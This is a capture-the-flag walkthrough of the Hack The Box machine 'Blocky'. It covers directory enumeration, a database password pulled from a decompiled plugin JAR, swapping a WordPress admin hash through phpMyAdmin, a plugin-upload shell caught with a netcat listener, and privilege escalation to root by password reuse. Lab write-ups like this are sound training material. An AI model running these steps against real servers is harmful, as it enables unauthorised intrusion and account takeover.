HTB: Blocky

Blocky

I’m getting out of order now. Whoops.

Ports

This has got:

21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2

FTP

ProFTPD 1.3.5 (before 1.3.5a) had a horrible vulnerability; this version does not. No anon access. Moving on.

HTTP

We have a wordpress site, but let’s run feroxbuster:

┌──(root💀kali)-[/opt/htb/blocky]
└─# feroxbuster -u http://10.10.10.37 -w /usr/share/seclists/Discovery/Web-Content/common.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.2.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.10.37
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.2.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
403       11l       32w      290c http://10.10.10.37/.hta
403       11l       32w      299c http://10.10.10.37/server-status
301        9l       28w      313c http://10.10.10.37/wp-admin
301        9l       28w      315c http://10.10.10.37/wp-content
403       11l       32w      299c http://10.10.10.37/wp-admin/.hta
403       11l       32w      301c http://10.10.10.37/wp-content/.hta
301        0l        0w        0c http://10.10.10.37/index.php
301        9l       28w      322c http://10.10.10.37/wp-admin/includes
301        9l       28w      315c http://10.10.10.37/phpmyadmin
405        1l        6w       42c http://10.10.10.37/xmlrpc.php
301        9l       28w      323c http://10.10.10.37/wp-content/uploads
302        0l        0w        0c http://10.10.10.37/wp-admin/index.php
301        9l       28w      320c http://10.10.10.37/wp-admin/images
301        9l       28w      319c http://10.10.10.37/wp-admin/maint
301        9l       28w      322c http://10.10.10.37/wp-content/themes
301        9l       28w      317c http://10.10.10.37/wp-admin/css
301        9l       28w      309c http://10.10.10.37/wiki
403       11l       32w      308c http://10.10.10.37/wp-admin/includes/.hta
403       11l       32w      308c http://10.10.10.37/wp-content/themes/.hta
403       11l       32w      303c http://10.10.10.37/wp-admin/css/.hta
403       11l       32w      295c http://10.10.10.37/.htaccess
403       11l       32w      301c http://10.10.10.37/phpmyadmin/.hta
301        9l       28w      312c http://10.10.10.37/plugins
403       11l       32w      306c http://10.10.10.37/wp-admin/images/.hta
403       11l       32w      309c http://10.10.10.37/wp-content/uploads/.hta
200        0l        0w        0c http://10.10.10.37/wp-content/index.php
403       11l       32w      295c http://10.10.10.37/wiki/.hta
403       11l       32w      305c http://10.10.10.37/wp-admin/maint/.hta
403       11l       32w      298c http://10.10.10.37/plugins/.hta
301        9l       28w      321c http://10.10.10.37/wp-admin/network
301        9l       28w      319c http://10.10.10.37/phpmyadmin/doc
403       11l       32w      310c http://10.10.10.37/wp-admin/maint/.htpasswd
403       11l       32w      310c http://10.10.10.37/phpmyadmin/doc/.htaccess
403       11l       32w      310c http://10.10.10.37/phpmyadmin/doc/.htpasswd
[####################] - 1m     65534/65534   0s      found:34      errors:47240  
[####################] - 57s     4681/4681    84/s    http://10.10.10.37
[####################] - 46s     4681/4681    104/s   http://10.10.10.37/wp-admin
[####################] - 42s     4681/4681    112/s   http://10.10.10.37/wp-content
[####################] - 33s     4681/4681    141/s   http://10.10.10.37/wp-admin/includes
[####################] - 38s     4681/4681    135/s   http://10.10.10.37/phpmyadmin
[####################] - 34s     4681/4681    137/s   http://10.10.10.37/wp-content/uploads
[####################] - 34s     4681/4681    151/s   http://10.10.10.37/wp-admin/images
[####################] - 35s     4681/4681    132/s   http://10.10.10.37/wp-admin/maint
[####################] - 33s     4681/4681    139/s   http://10.10.10.37/wp-content/themes
[####################] - 33s     4681/4681    140/s   http://10.10.10.37/wp-admin/css
[####################] - 31s     4681/4681    150/s   http://10.10.10.37/wiki
[####################] - 29s     4681/4681    177/s   http://10.10.10.37/plugins
[####################] - 17s     4681/4681    386/s   http://10.10.10.37/wp-admin/network
[####################] - 21s     4681/4681    235/s   http://10.10.10.37/phpmyadmin/doc

Lots of juicy stuff there! At plugins we find Cute File Browser with two files - BlockyCore.jar and griefprevention-1.11.2-3.1.1.298.jar.

We can extract the jar:

┌──(root💀kali)-[/opt/htb/blocky]
└─# jar -xf BlockyCore.jar                                                 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

And then we have BlockyCore.class. I don’t have a Java decompiler so I go to http://www.javadecompilers.com/ and decompile the file:

// 
// Decompiled by Procyon v0.5.36
// 

package com.myfirstplugin;

public class BlockyCore
{
    public String sqlHost;
    public String sqlUser;
    public String sqlPass;
    
    public BlockyCore() {
        this.sqlHost = "localhost";
        this.sqlUser = "root";
        this.sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
    }
    
    public void onServerStart() {
    }
    
    public void onServerStop() {
    }
    
    public void onPlayerJoin() {
        this.sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
    }
    
    public void sendMessage(final String username, final String message) {
    }
}

Those creds look interesting! Let’s go to phpmyadmin and login. This works; we can grab the hash for our lone wordpress user, notch. It doesn’t want to crack immediately with John so I replace it with:

$P$BDZFisiinAqGeR02VRcdlEcP7IZvxL1

Which is the wordpress hash for password. With this changed I can log in at /wp-admin/. I upload a plugin as a zipfile and get a shell.

Privesc

The privesc was very simple; the password we extracted from the JAR file was also the system password for notch; and he is in the sudo group.

┌──(root💀kali)-[/opt/htb/blocky]
└─# nc -nvlp 1234                                                         

listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.37] 43190
bash: cannot set terminal process group (1464): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Blocky:/var/www/html/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash");'
<ml/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@Blocky:/var/www/html/wp-admin$ su notch
su notch
Password: 8YsqfCTnvxAUeduzjNSXe22

notch@Blocky:/var/www/html/wp-admin$ sudo su
sudo su
[sudo] password for notch: 8YsqfCTnvxAUeduzjNSXe22

root@Blocky:/var/www/html/wp-admin# cd /root
cd /root
root@Blocky:~# cat root.txt
cat root.txt
# flag goes here

Another one bites the dust.